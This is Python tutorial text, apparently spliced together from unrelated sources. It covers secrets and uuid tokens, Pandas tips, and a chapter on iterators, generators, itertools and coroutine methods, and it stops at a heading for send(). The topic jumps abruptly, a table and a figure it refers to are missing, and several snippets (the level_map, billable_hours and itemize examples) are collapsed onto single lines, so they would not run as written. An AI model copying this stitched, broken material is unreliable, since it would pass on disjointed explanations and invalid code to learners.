>>> DATABASE {'p_Z4fLI': 'https://realpython.com/', 'fuxSyNY': 'https://docs.python.org/3/howto/regex.html'}

Note that token_urlsafe() uses a URL-safe base64 encoding, where each character carries 6 bits of data (the values 0 through 63 map onto the characters A-Z, a-z, 0-9, and - and _). If you specify a certain number of bytes nbytes, the resulting length of secrets.token_urlsafe(nbytes) will be math.ceil(nbytes * 8 / 6). The bottom line here is that, while secrets is really just a wrapper around existing Python functions, it can be your go-to when security is your foremost concern.
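A quick sanity check of that length relationship:

import math
import secrets

# The URL-safe token length should match ceil(nbytes * 8 / 6)
for nbytes in (5, 16, 32):
    token = secrets.token_urlsafe(nbytes)
    assert len(token) == math.ceil(nbytes * 8 / 6)
    print(nbytes, len(token))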

Universally unique identifiers with uuid()

One option for generating a random token is the uuid4() function from Python’s uuid module. A UUID is a Universally Unique IDentifier, a 128-bit sequence (str of length 32) designed to “guarantee uniqueness across space and time.” uuid4() is one of the module’s most useful functions, and this function also uses os.urandom() under the hood:

>>> import uuid
>>> uuid.uuid4()
UUID('3e3ef28d-3ff0-4933-9bba-e5ee91ce0e7b')

>>> uuid.uuid4()
UUID('2e115fcb-5761-4fa1-8287-19f4ee2877ac')

The nice thing is that all of uuid’s functions produce an instance of the UUID class, which encapsulates the ID and has convenient properties such as .bytes, .hex, and .int:

>>> tok = uuid.uuid4()
>>> tok.bytes
b'.\xb7\x80\xfd\xbfIG\xb3\xae\x1d\xe3\x97\xee\xc5\xd5\x81'

>>> len(tok.bytes)

16

>>> len(tok.bytes) * 8  # In bits
128

>>> tok.hex
'2eb780fdbf4947b3ae1de397eec5d581'

>>> tok.int
62097294383572614195530565389543396737

You may also have seen some other variations: uuid1(), uuid3(), and uuid5(). The key difference between these and uuid4() is that those three functions all take some form of input, and therefore don’t meet the definition of random to the extent that a Version 4 UUID does:

uuid1() uses your machine’s host ID and the current time by default. Because of the reliance on the current time down to nanosecond resolution, this version is where UUID derives the claim of “guaranteed uniqueness across time.”

uuid3() and uuid5() both take a namespace identifier and a name. The former uses an MD5 hash and the latter uses SHA-1.

uuid4(), conversely, is entirely pseudorandom. It consists of getting 16 bytes via os.urandom(), converting them to a big-endian integer, and performing a number of bitwise operations to comply with the formal specification.

One issue that can happen here is collisions. A collision would simply refer to generating two matching UUIDs. What is the chance of that? Well, it is technically not zero, but perhaps it is close enough: there are 2 ** 128 or 340 undecillion possible uuid4 values. I will leave it up to you to judge whether this is enough of a guarantee to sleep well. One common use of uuid is in Django, which has a UUIDField that is often used as a primary key in a model’s underlying relational database.
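For reference, such a primary key is commonly declared along the following lines; the model and field names here are illustrative assumptions rather than code from a specific project.

import uuid
from django.db import models

class ShortenedURL(models.Model):
    # Version 4 UUIDs as primary keys; generated on insert, never edited
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    target = models.URLField()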

Bonus pointers

After all the features and optimizations that we have covered in this chapter, I am sure you will have gained some instincts on how to use the power of Pandas to your advantage. Listed here are some additional pointers that you may already know, but the usage shown here can make the life of a data scientist quite easy.

select_dtypes: When a table is being read, default data types are assigned to each of the columns. Dataframes provide you with a way to check the inferred types. You can also lookup all possible data types in the dataframe, for which, we can try the following:

df.dtypes.value_counts()

In case you want to selectively view the columns for a few specific data types, you can use the select_dtypes method.

df.select_dtypes(include=['float64', 'int64'])

This will return a sub-dataframe that contains only numerical values.

map: This is a cool command to do easy data transformations. You first define a dictionary with ‘keys’ being the old values and ‘values’ being the new values.

level_map = {1: 'high', 2: 'medium', 3: 'low'} df['c_level'] = df['c'].map(level_map)

Sample use cases: mapping True and False to 1 and 0 (for modeling); defining levels; user-defined lexical encodings.

Percentile groups: If you want to classify a column with numeric data into groups of percentiles, then you can make use of Pandas’ qcut() function. You can also achieve the same behaviour by using NumPy, as follows:

import numpy as np

cut_points = [np.percentile(df['c'], i) for i in [50, 80, 95]]
df['group'] = 1
for i in range(3):
    df['group'] = df['group'] + (df['c'] < cut_points[i])

Now, consider the following examples of Python sequences – a list, a tuple, and a string:

>>> marks = [21, 32, 43, 55, 67]
>>> studentsNum = (14, 25, 37)
>>> text = "monty python"

What is specific to sequences includes the following:

These are indexed and the index starts with zero and ends with the length of the sequence less one.

These have fixed lengths. They can be sliced.

All the examples of strings, tuples, or lists follow these conventions.

>>> marks[0]
21

>>> studentsNum[2]
37

>>> text[4]
'y'

One thing to note here is that not every iterable in Python will be a sequence. For example, Dictionaries, Generators, Sets, and Files can all be looped through as iterables, but they are not sequences, as they do not satisfy the preceding criteria.

>>> dummy_set = {21, 32, 43}
>>> another_set = (number**2 for number in dummy_set)
>>> dummy_dict = {'key1': 'val1', 'key2': 'val2'}
>>> dummy_file = open('some_file.txt')

Lists, Strings, and Tuples are sequences since they have indexes starting at 0, they are of fixed length, and they can be sliced. Dictionaries, Sets, Files, and Generators are not. However, they are all iterables.

for loops – under the hood

Have you ever wondered how loops in Python handle the iteration of different kinds of iterables and still provide a consistent API? While iterating over a sequence, you can use the indexes that are created automatically while initializing the sequence values.

ages = [11, 32, 43, 15, 67]
index = 0
while index < len(ages):
    print(ages[index])
    index = index + 1

Now, if we try the same approach for let’s say, a set, the following exception will be thrown by the interpreter:

>>> singers = {'Adele', 'justin', 'ariana', 'mozart'}
>>> index = 0
>>> while index < len(singers):
…     print(singers[index])
…     index = index + 1
…
Traceback (most recent call last):
  File "<stdin>", line 2, in <module>
TypeError: 'set' object does not support indexing

We see that since sets do not fall under the sequence banner, they do not have indices. Python uses iterators for looping over these types, which are not sequences. Let us see how that works. Consider the three iterables that we had discussed earlier – a list, a tuple, and a string respectively:

>>> marks = [21, 32, 43, 55, 67] >>> studentsNum = (14, 25, 37)

>>> text = "monty python"

An iterator can be retrieved for these data types with the help of the iter() built-in function in Python. Irrespective of the iterable type being passed, the return type is always an iterator.

In [4]: iter(marks)
Out[4]: <list_iterator at 0x22ad245fd60>

In [5]: iter(studentsNum)
Out[5]: <tuple_iterator at 0x22ad3f6fd90>

In [6]: iter(text)
Out[6]: <str_iterator at 0x22ad38d5070>

Now, using these iterators, the built-in next() method can be invoked to churn out the next element in the data structure.

>>> heights = [18, 12, 33]
>>> ht_iterator = iter(heights)

>>> next(ht_iterator)
18

>>> next(ht_iterator)
12

Python iterators are stateful in nature, meaning they persist the current state of the iteration; once an item is returned, it will not be encountered again unless the iterator is re-initialized. Explicitly invoking the next() method on an iterator that has exhausted its contents will raise the StopIteration exception.

In [5]: next(ht_iterator)
Out[5]: 33

In [6]: next(ht_iterator)
---------------------------------------------------------------
StopIteration                             Traceback (most recent call last)
----> 1 next(ht_iterator)

StopIteration:

Think of Iterators as toothpaste tubes. Once you have squeezed out a value, you cannot put it back in. And once you have exhausted the toothpaste, the tube has practically no use.

Iterators are iterables

It is worth noting again that every iterator in Python is also an iterable and it can be looped over. However, you can also use an iterator to get another iterator from itself.

>>> integers = [11, 22, 33]
>>> iter1 = iter(integers)
>>> iter2 = iter(iter1)

>>> iter1 is iter2
True

Iterators return their own instance back when you call on them with the iter() method. Also, iterators by themselves are also iterables, although they lack the extensive features that iterables have.

Iterators are dynamic objects and they do not have a pre-defined length; consequently, you cannot index an iterator.

>>> integers = [71, 62, 53, 45, 37]
>>> intIter = iter(integers)

>>> len(intIter)
TypeError: object of type 'list_iterator' has no len()

>>> intIter[1]
TypeError: 'list_iterator' object is not subscriptable

Iterators can be considered as lazy iterables, which are meant for a single use on every instantiation. Not all iterables are iterators, but all iterators are iterables. A summary of all the possible cases is presented in the following table:


Table 7.2: Comparison of Iterators and Iterables

Python 2.x compatibility

This book focuses on Python 3.x for most of the code and features discussed. However, when talking about iterators that are class based, some of the following architectural differences need to be kept in mind:

The next value in the iterator is retrieved using the __next__() method in Python 3. For achieving the same operation in Python 2, the method used is the next() method.

The question in consideration here is about the backward compatibility in production code. So, if you want to enable the same code to work for both Python 2 and Python 3, you have to avoid any confusions in the difference in names. Let’s take a look at an approach that you can follow to ensure this compatibility.

The simplest way to achieve this is to implement both the methods in the class:

class DemoProcess(object):
    def __init__(self, argument):
        self.data = argument

    def __iter__(self):
        return self

    def __next__(self):
        return self.data

    # For compatibility with Python 2:
    def next(self):
        return self.__next__()

So, you see that we have created an alias for the next() method, which simply redirects to the __next__() method. This will make your code independent of Python versions. Also, note that the class derives from the base object class, so that a new-style class is instantiated in Python 2, which is a widely accepted practice for compatibility.

Iterator chains

This is another interesting feature of Python that I first encountered at a PyCon by David Beazley and it seemed to catch on. Using multiple iterators, one can create robust and efficient pipelines for processing data. These are known as iterator chains and are constructed using generators in Python. In this section, we will be looking at how to construct these iterator chains and use them for more powerful application code. Now generators and generator expressions help to wipe out a ton of boilerplate code that is required for creating iterators based on classes, and can therefore be referred to as syntactic sugar for iterator creation.

Generators result in a sequence or stream of values during the course of their lifetime. Take the following simple example that maintains a counter and returns every consecutive even number when the generator is invoked:

def even_numbers():
    for index in range(0, 20):
        if index % 2 == 0:
            yield index

If we now try to execute this on an iPython terminal, the following behaviour is observed:

>>> even_chain = even_numbers()
>>> list(even_chain)
[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]

That was simple. Let us dig deeper. Python allows you to redirect the stream, resulting from the even_chain generator into another generator that applies a different operation on the values and generates a new output stream of values. Thus, you will be connecting these operations into a chain or a directed graph. To illustrate this, let’s say you want to get the double of the resultant values from the preceding generator:

def even_double(sequence):
    for index in sequence:
        yield 2 * index

What you have now created is a chain of generators – visualize the data streams flowing through each yield statement, creating a pipeline. If you execute the preceding code, you will see the following output:

>>> even_double_nums = even_double(even_numbers())
>>> list(even_double_nums)
[0, 4, 8, 12, 16, 20, 24, 28, 32, 36]

We can keep adding multiple entities to this chain in order to accomplish many more related tasks in a predefined manner. It is important to note that these chains are unidirectional when it comes to data flow and the language has well defined interfaces to shield every task in the chain. You can think of this as writing piped bash commands in UNIX to redirect the output of one command as the input of another.

Let us now add another step to the pipeline to convert each value into the cumulative value of the sequence in the pipeline and see what happens:

def cumulative(sequence):
    sum_till_now = 0
    for index in sequence:
        sum_till_now += index
        yield sum_till_now

The chain of iterators now will have a new task for getting the cumulative value at each index of the sequence and return the value. To see this in action, let’s execute the following:

>>> cumulative_vals = cumulative(even_double(even_numbers()))
>>> list(cumulative_vals)
[0, 4, 12, 24, 40, 60, 84, 112, 144, 180]

The chain finally looks like the following:

Figure 7.1: Chain of iterators example

There are the following two things that I find interesting about this technique of chaining generators:

The start-to-end processing takes place one element at a time from the sequence or stream of values.

There is no intermediate buffering between the chain tasks, therefore such chains would usually operate using O(1) space in memory (although the generators would take up some space on the stack and heap).

You can introduce more complex operations in the form of tasks, and retain the performance and efficiency of the pipeline, since every task will relate to a generator entity with its own well-defined unit of work.

Let us now discuss a way in which we can create a more concise version of this pipeline, with negligible compromise on the readability of the code, using generator expressions:

# Using Generator Expressions
even_numbers = (x for x in range(0, 20) if x % 2 == 0)
even_double = (2 * x for x in even_numbers)

# Regular Generator function
def cumulative():
    sum_till_now = 0
    for index in even_double:
        sum_till_now += index
        yield sum_till_now

Notice how we have replaced each processing step in the chain with a generator expression built on the output of the previous step. This code is equivalent to the chain of generators that we built throughout the chapter:

In [24]: even_numbers
Out[24]: <generator object <genexpr> at 0x000001F2CD116900>

In [25]: even_double
Out[25]: <generator object <genexpr> at 0x000001F2CD1DF7B0>

In [26]: list(even_double)
Out[26]: [0, 4, 8, 12, 16, 20, 24, 28, 32, 36]

In [26]: cumulative
Out[26]: <function __main__.cumulative()>

In [27]: # NOTE: Create the even_numbers and
# even_double generator expressions once more to
# execute the below line, since we already exhausted
# them. Remember: single-use only.

In [28]: list(cumulative())
Out[28]: [0, 4, 12, 24, 40, 60, 84, 112, 144, 180]

We see that by using generator expressions, we have simplified the final call to this pipeline to only call the final generator function.

Generator expressions will simplify the code, but you can’t pass function arguments to them, or use them more than once in the same pipeline.

Therefore, we see that by using a combination of generator functions and generator expressions, we are able to create a performant pipeline. The combination of both culminates into a robust and more readable pipeline of tasks.

Creating your own iterator

Python not only gives you several useful iterators to use, it also gives the developer the power to create their own iterators and lazy iterables. Let us illustrate this feature with the help of an example of an iterator that accepts an iterable of integers and results in a sequence of ‘doubled’ values when you loop over it.

class get_doubles:
    def __init__(self, integers):
        self.integers = iter(integers)

    def __next__(self):
        return next(self.integers) * 2

    def __iter__(self):
        return self

Now, we can create an instance of this class and loop over it. We will be using the count API in the Itertools library to generate the input for it.

>>> from itertools import count
>>> integers = count(20)

>>> doubles = get_doubles(integers)

>>> next(doubles)
40

>>> next(doubles)
42

Therefore, this is one way of creating the needed iterators. However, a simpler way to create the iterators you will use in your day-to-day operations is to define a generator function. When you need more complexity and modularity in your iterators, choose the class-based implementation.

# Alternate implementation based on functions
def get_doubles(integers):
    for index in integers:
        yield 2 * index

The preceding implementation works essentially in the same way as the class-based iterator. Another method to create your own iterator is with the help of a generator expression.

def get_doubles(integers):
    return (2 * index for index in integers)

Notice how the syntax of the expression is similar to that of list comprehensions. Lazy iterables can be implemented with all three techniques; however, the simplest and most direct approach is to use generator functions and expressions, and to consider the class-based iterators for more complex and modular iterators.

Improve code with lazy iterables

Now that we have learnt about lazy operations with iterables, let’s use this section to discuss how to create different helper methods that can assist in creating effective loops using iterables for data processing.

Lazy summation

Suppose you have the data of every on-the-hour worker in a project and the number of billable hours that they spent working on the project in a database. The information queried needs to be filtered for the chargeable events by only those employees who are on the payroll and the total time spent on the project has to be computed. The simplest way to add up these individual times would be the following: # The Regular Way billable_hours = 0 for employee in all_employees: if employee.on_payroll(): billable_hours += employee.time_spent

We can achieve the same logic using a generator expression which will now enable it to be lazily evaluated:

# The Pythonic Way
all_times_spent = (
    employee.time_spent
    for employee in all_employees
    if employee.on_payroll()
)
billable_hours = sum(all_times_spent)

The differences are subtle but it can prove to be effective in the end for maintaining a healthy code base:

We could now give an appropriate name to the logic for the ease of identification.

We could now use the built-in sum() function, since we have an iterable, which will have a better performance than manually running these operations.

You can fundamentally alter the structure of code to a more robust one with the help of iterators.

Lazy breaking out of loops

Suppose you are processing a log file and only want to read and print the first 150 lines using a Python method. The simplest contents of this method could be like the following:

# The Regular Way
for index, content in enumerate(file_reference):
    if index >= 150:
        break
    print(content)

We can achieve similar results with the help of the lazy loading generators. For this specific use case, we will be using the islice() generator defined in the Itertools package.

# The Pythonic Way
from itertools import islice

lines_iterator = islice(file_reference, 150)

for lineContent in lines_iterator:
    print(lineContent)

Therefore, we first create a generator that loops through only the required number of lines, and give it the descriptive name lines_iterator. Hence, the second approach makes the code descriptive and enhances readability. Also, notice that you do not have to worry about the break statement in the code anymore; it is inherently handled by the generator.

There are several iteration specific helper functions in the itertools Python standard library. Several other third party packages also exist, the likes of more-itertools or boltons, which provide enhanced functionality for iterations.

Creating your own iteration helpers

We saw how and where to use the iteration helper functions from the external or internal libraries. However, it is not too difficult to create our own set of iteration helpers. Let us illustrate this with the help of a use case for finding the deltas for a sequence of numbers:

# The Regular Way
time_diff = []
prev_time = all_call_times[0]
for curr_time in all_call_times[1:]:
    time_diff.append(curr_time - prev_time)
    prev_time = curr_time

Can you think of what is lacking in this piece of code? Take a look at the following:

An additional variable is being used in each iteration of the loop.

The usage is restricted to sliceable objects like lists or sequences. The code will not work for generators, or any other iterators. So, how can we make this better in terms of performance and versatility? Let us try to implement this with the help of generator functions. First, we define a generator, itemize, that gets the next element from the sequence for processing:

def itemize(iterable): """Yield (prev_time, curr_time) for every iterable item.""" iterator = iter(iterable) prev_time = next(iterator) for curr_time in iterator: yield prev_time, curr_time

prev_time = curr_time

We simply get the iterator from our iterable, retrieve the items using next(), and keep track of the previously encountered item at each step. You might have noticed that this method looks similar to the previous implementation. However, with generators, this function can work with all kinds of iterables and is not limited to sequences only.

time_diff = []
for prev_time, curr_time in itemize(all_call_times):
    time_diff.append(curr_time - prev_time)

Isn’t this more pleasing to the eye? No additional variables to deal with. The itemize generator tracks the changes in items, and we have managed to modularize the core code. The usage is compact and can even be replaced with a list comprehension.

time_diff = [(curr_time - prev_time)
             for prev_time, curr_time in itemize(all_call_times)]

Differences between lazy iterable and iterables

Anything that can be looped over is an iterable in Python.

If the entity that is being looped over is computing the elements while looping, it is referred to as a lazy iterable. If the object can be passed to the next() method to retrieve the subsequent values, it is an example of an iterator.

On the other hand, if the same object can be looped over repeatedly without its values being exhausted, it is not an iterator. Note that the range object in Python 3 is not an iterator. It is simply a lazy object instance. If you call next() on a range object, it will result in an error:

In [1]: range_obj = range(20)

In [2]: print(next(range_obj))
TypeError: 'range' object is not an iterator

The range object in Python 3 is not an iterator.

I have heard many people, from novice to experienced Python developers using the word iterator for teaching the concept of ranges. This becomes confusing and can mislead developers.

The range object is a lazy object implementation – it does not contain any predefined values, but only yields the values as and when the loop needs them. A range object and a generator (which is an iterator) can be defined as follows:

>>> integers = range(1_000)
>>> doubles = (2*index for index in integers)

One difference that distinguishes iterators from lazy objects like range is that a range has a predefined length, while iterators do not:

>>> len(integers)
1000

>>> len(doubles)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: object of type 'generator' has no len()

The other difference is that iterators cannot be indexed, while the range object can be indexed and allows random access.

>>> integers[-3]
997

>>> doubles[-3]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'generator' object is not subscriptable

Thirdly, you can query for the existence of a particular value in a range without the underlying object being modified. With iterators, querying for existence consumes the underlying object.

>>> 98 in integers
True

>>> 98 in integers
True

>>> 98 in doubles
True

>>> 98 in doubles
False

Therefore, range objects are not exactly fitting into the iterator categorization. We can refer to them as lazy sequences which are basically implemented using sequences like tuples, strings, or lists, but they do not store anything in memory. Rather, they derive the values computationally when required.

The itertools library

Iterators are a powerful concept in Python and this is extended with several API libraries. The Itertools module comes built-in and houses several interesting functions, which together form the ‘iterator algebra’, to be used to make your code elegant and performant. In other words, Itertools have functions that operate on iterators to create iterators that are more complex. The example of the sequence-based generator is similar to the itertools.count() method. In this section, we will take a glimpse into some additional functionality provided by the itertools module.
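For instance, count() gives an infinite, lazily evaluated counter that pairs naturally with the other itertools helpers; a small illustration, using islice() to take only the first few values:

>>> import itertools
>>> evens = (2 * n for n in itertools.count(start=0))
>>> list(itertools.islice(evens, 5))
[0, 2, 4, 6, 8]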

Let us consider from a previous example where we want to parse the values of the employees’ billable hours, but now only for those employees who are over the age of 40. The regular approach to this problem would be to use a conditional in the loop:

# …
def get_total_time(self):
    for employee in self.employees:
        if employee.age > 40:
            …

This is what most novice programmers would do. However, think about it – what if the threshold value changes? How do we pass the new value? In addition, there may be cases when the

condition itself might change in the future. How do we accommodate for such changes in a lesser intrusive manner? The preceding code is considered rigid, which is usually a sign of bad code.

On the other hand, we do not want to overload this object with too many customizations as coupling it to external factors would lose the essence of its core functionality. So where else can we address these additional functionalities?

For the sake of reusability, we will ensure that the object is independent of its users or clients and thereby keep it modular. So, rather than modifying the code, we will ensure that the input data is filtered as per the requirements of the class’s users. As per the preceding example, if we want to filter the data based on the employee’s age being greater than 40, we will apply the following:

from itertools import islice

employees = islice(filter(lambda e: e.age > 40, employees), 10)
hours = EmployeeStats(employees).get_total_time()
# …

This implementation has no memory overhead: since it is built with generators, it follows a lazy approach to evaluation. This is specifically helpful for filtering large datasets that cannot be placed in memory all at once.

Other common itertools features

Of the several features that Itertools houses, some of the most common features that I find particularly useful in writing better code every day are listed as follows:

The accumulate function: accumulate(iterable[, func, *, initial=None]) creates an iterator that returns accumulated results, applying a binary (two-argument) function, passed as the func argument, to a running total and each element. This might seem confusing initially, so let’s see it in action with an example:

>>> import itertools
>>> records = [520, -250, -207, -120, -200, -320]
>>> int_rate = 2.073

>>> for record in itertools.accumulate(records,
…         lambda cost, advance: cost*int_rate + advance):
…     print(record)
520
827.96
1509.3610800000001
3008.9055188400002
6037.4611405553205
12195.65694437118

The groupby function: groupby(iterable, key=None) accepts an iterable and, optionally, a key function, which decides how to group the elements of the iterable. The elements must be sorted by the same key as a prerequisite for appropriate grouping. Let us take an example to illustrate this – say some new employees join the organisation and need to be grouped based on their last names for better crowd management on the first day. The following code shows how groupby() is used to achieve the desired result.

>>> new_emps = ['D Hardman', 'H Spector', 'J Pearson',
…               'L Litt', 'S Cahill', 'A Hall']
>>> grouped_emps = {}

>>> key_with_names = lambda n: n.split()[-1][0]
>>> new_emps_sorted = sorted(new_emps, key=key_with_names)

>>> for initial, grp_names in itertools.groupby(
…         new_emps_sorted, key=key_with_names):
…     grouped_emps[initial] = list(grp_names)

>>> grouped_emps
{'C': ['S Cahill'], 'H': ['D Hardman', 'A Hall'], 'L': ['L Litt'],
 'P': ['J Pearson'], 'S': ['H Spector']}

The combinations function: combinations(iterable, r) expects an iterable and an integer length r, and returns the subsequences of the input that have a length of r. The returned values are tuples, and the original order of the elements is preserved. As an example, let’s generate the different amounts of change that can be made from a given set of coins with different denominations:

>>> def coin_change(set_of_coins, length):
…     change_possible_for = set()
…     for coin_subset in itertools.combinations(set_of_coins, length):
…         change_possible_for.add(sum(coin_subset))
…     return sorted(change_possible_for)

>>> coin_change([2, 5, 10, 1, 5, 1, 5], 3)
[4, 7, 8, 11, 12, 13, 15, 16, 17, 20]

>>> coin_change([5, 1, 10, 10, 2, 5, 2], 4)
[10, 13, 14, 15, 18, 19, 21, 22, 23, 24, 26, 27, 30]

The product function: product(*iterables, repeat=1) generates the Cartesian product of one or more iterables. This is equivalent to a single construct that replaces multiple nested for loops. You use the repeat argument when you want to take the product of an iterable with itself. As an example, let us say you play a game where you have to pick the first and last names for a celebrity from two different lists. The possible names can be found from the product of the following two lists:

>>> celeb_fnames = ['Robert', 'Chris', 'Tom']
>>> celeb_lnames = ['Downey', 'Evans', 'Cruise']

>>> for full_name in itertools.product(celeb_fnames, celeb_lnames):
…     full_name = " ".join(full_name)
…     initials = "".join(n[0] for n in full_name.split())
…     print(f'Possible Name: {full_name}')
Possible Name: Robert Downey
Possible Name: Robert Evans
Possible Name: Robert Cruise
Possible Name: Chris Downey
Possible Name: Chris Evans
Possible Name: Chris Cruise
Possible Name: Tom Downey

Possible Name: Tom Evans
Possible Name: Tom Cruise

The permutations function: permutations(iterable, r=None) returns fixed-length permutations when an iterable and a length r are given. If no length is specified, full-length permutations are generated. The behaviour of this function is nearly the same as that of the combinations() method, except that in this case, the order of the elements matters.

>>> integers = [10, 22]

>>> print(list(itertools.combinations(integers, 2)))
[(10, 22)]

>>> print(list(itertools.permutations(integers, 2)))
[(10, 22), (22, 10)]

Wherever possible, we should try using these functions instead of implementing our own versions, as they have been particularly optimized for handling complex iteration requirements.

Generators

Generators are simplified iterators

By now, we are familiar with what generators and iterators are. We now look at how some specific scenarios can be optimized with the help of generators and iterators.

Repeated iterations

Sometimes, explicit definitions for repeated iterations can be avoided by the help of generators. One such example would be to use the tee() method from the itertools module:

import itertools
from statistics import median

def get_all_stats(emp_times):
    min_times, max_times, avg_times = itertools.tee(emp_times, 3)
    return (min(min_times), max(max_times), median(avg_times))

Here, the itertools.tee() will replicate the iterable into three new iterables, each of which will be used for different operations. So, the key point to remember here is that, if you feel there is a requirement to loop over the same iterable more than once, think about using the itertools.tee() function.

Nested loops

After repetition, let us talk about dimensions – sometimes, the lookup for elements might require expanding the search across multiple dimensions, especially with the help of nested loops as the simplest approach. When a search is successful, break statements are needed in every level of the nested loops to terminate the execution.

Therefore, how do we go about making this more optimal – we look for ways to flatten the execution into a single for loop. An example is presented as follows:

# The Regular Way
def nested_search(elem_list, search_val):
    location = None
    for x, elem_row in enumerate(elem_list):
        for y, elem_cell in enumerate(elem_row):
            if elem_cell == search_val:
                location = (x, y)
                break
        if location is not None:
            break

    if location is None:
        raise ValueError(f"{search_val} not found")

    logger.info("Search successful - %r found at [%i, %i]",
                search_val, *location)
    return location

A more compact approach to solving this without using many checks or flags in the code would be as follows:

# The Pythonic Way
def _search_matrix(matrix):
    for x, elem_row in enumerate(matrix):
        for y, elem_cell in enumerate(elem_row):
            yield (x, y), elem_cell

def search(matrix, search_val):
    try:
        location = next(
            location
            for (location, elem_cell) in _search_matrix(matrix)
            if elem_cell == search_val
        )
    except StopIteration:
        raise ValueError(f"{search_val} not found")
    logger.info("Search successful - %r found at [%i, %i]",
                search_val, *location)
    return location

You should note here that the auxiliary generator that we created, fulfilled the requirement for iteration. This abstraction can be extended into more levels or dimensions of iteration where needed, and the client or end user would not need to know about the underlying mechanism. The Iterator design pattern in Python provides inherent support for iterator objects and is therefore, transparent in nature.

Try to simplify the iteration as much as possible with as many abstractions as are required, flattening the loops whenever possible.

Using generators for lazily loading infinite sequences

Let’s consider the cases when the sequence in question is infinite in nature, or when generating every element requires complex calculations and we don’t want the user to wait while these operations happen. These are perfect use cases for generators.

Note that in Python, generators are a specialized form of coroutine that returns an iterator. Because their current state is always saved, every subsequent step kicks off from where we left off. The following are examples of how generators can be used to alleviate the preceding situations.

The regular way:

def filter_stream_by_phrase(phrase):
    magic_tweet_api = MagicTweetAPI()
    if magic_tweet_api.stream_data_exists_for(phrase):
        return magic_tweet_api.get_stream(phrase)

# The method returns the stream data till the point
# it is invoked. You have to call the above method
# repeatedly whenever you need more entries.
# Not ideal!!
stream_data = filter_stream_by_phrase('#thepythonicway')
for tweet in stream_data:
    apply_operations(tweet)

# The second use case can be represented by pseudo
# Python code like this
def process_dataset(dataset):
    return [complex_computation_one(dataset),
            complex_computation_two(dataset),
            complex_computation_three(dataset)]

# The Pythonic Way
def filter_stream_by_phrase(phrase):
    magic_tweet_api = MagicTweetAPI()
    while magic_tweet_api.stream_data_exists_for(phrase):
        yield magic_tweet_api.get_stream(phrase)

# As a generator, now the function can be run
# continuously using less resources and in the client
# code, we can infinitely loop till a termination
# signal is received.
for tweet in filter_stream_by_phrase('#thepythonicway'):
    if termination_signal_received:
        break
    apply_operations(tweet)

# For the second use case, using yield will keep
# computations limited to only the current step
def process_dataset(dataset):
    yield complex_computation_one(dataset)
    yield complex_computation_two(dataset)
    yield complex_computation_three(dataset)

Prefer generator expressions to list comprehensions for simple iterations

This applies to situations when you want to iterate through a sequence and at each stage, a simple operation needs to be performed. A simple example to consider for this case is when you want to iterate through a list of names, and you want to turn the names to camel case, that is, capitalize the first letter.

A simple way everyone would think of is to build the updated sequence and iterate in place. A list comprehension seems like the way to go here. Let’s try out generators for a change here and see what happens.

List comprehensions generate all the objects first and fill the list in. When the size of the list is very large, this turns out to be intensive in terms of computation and resources. Generators work on-demand and help contain the amount of resources utilized. Imagine if you want to run the program for the names of all the books in a library – the list comprehension would blow up the memory usage, while the generator will not even cause a blip.

# The Regular Way
for book in [book.upper() for book in retrieve_all_book_names()]:
    index_book(book)

# The Pythonic Way
for book in (book.upper() for book in retrieve_all_book_names()):
    index_book(book)

Coroutines

In the previous sections, we have discussed generator objects that implement the __next__ and __iter__ methods. Every generator object can be iterated over and can also be used in conjunction with the next() method to move in steps.

Apart from these, some other methods are used to make them perform as coroutines (PEP-342). The evolution of coroutines from generators for handling asynchronous programming will be explored in this section, following which we will look at some of the details of performing asynchronous programming efficiently.

The methods introduced in PEP-342 are as follows:

.close()

.throw(ex_type[, ex_value[, ex_traceback]])

.send(value)

Generator interface methods

In this section, let us dive deeper into the syntax, operation, and usage of the methods outlined earlier. This will enable us to construct simple, efficient coroutines.

Post that, we can look into some of the more complex and practical uses of coroutines, also referred to as sub-generators – like refactoring of code along with the orchestration of various coroutines.

The close() method

As the name suggests, this method aids in the termination of the generator or to handle a finishing status. When invoked, it raises the GeneratorExit exception. This needs to be handled; else, the generator terminates and stops the dependent iteration process.

Resource management, when applicable to your co-routine, can be handled by catching this exception and thereby releasing the handles. You can relate it to how the finally block in the try… except construct works, or how the context managers operate, that is, explicitly handle the termination with the help of this Exception.

A common use case in data-oriented teams would be connecting to databases. Say you are writing code for initiating a connection with a database and using it to query results in fixed-size batches, instead of all at once.

def fetch_db_data(db_conn):
    try:
        while True:
            yield db_conn.fetch_records(25)
    except GeneratorExit:
        db_conn.close()

Every invocation of this generator fetches 25 entries from the database in a batch and returns them. When we no longer want to keep fetching values, the close() method needs to be invoked on the generator to gracefully terminate the persisted database connection.

>>> datagen = fetch_db_data(DBConnection("sampledStats"))
>>> next(datagen)
[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]
>>> next(datagen)
[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]
>>> datagen.close()
INFO: terminating database connection 'sampledStats'

Use the close() method on generators for performing finish-up tasks when needed.

The throw() method

The purpose of this method is to raise an exception at the point where the generator is suspended. If the generator handles it, the relevant except clause will be invoked; otherwise, the exception will propagate to the caller of the generator object.

Let us modify the example from the previous section to highlight how this operates and how the coroutine handles (or does not handle) the exception:

class SpecificException(Exception):
    pass

def fetch_db_data(db_conn):
    while True:
        try:
            yield db_conn.fetch_records(25)
        except SpecificException as ex:
            print("This is an expected error %r, resuming…" % ex)
        except Exception as ex:
            print("This is an unexpected error %r, Stopping…" % ex)
            db_conn.close()
            break

Now, we have defined a SpecificException class and are handling it separately, since we do not want to terminate the program execution but simply log the error in detail.

>>> datagen = fetch_db_data(DBConnection("sampledStats"))
>>> next(datagen)
[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]
>>> next(datagen)
[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]
>>> datagen.throw(SpecificException)
This is an expected error SpecificException(), resuming…
[(0, 'dataPoint I'), (1, 'dataPoint II'), (2, 'dataPoint III'), …]
>>> datagen.throw(RuntimeError)
This is an unexpected error RuntimeError(), Stopping…
INFO: terminating database connection 'sampledStats'
Traceback (most recent call last):
…
StopIteration

This handled the custom exception, where we simply wanted to inform and continue, as well as other generic exceptions. However, even then, the termination was gracefully handled and the iteration was stopped, which is evident from the StopIteration exception that was raised.

The send(value) method

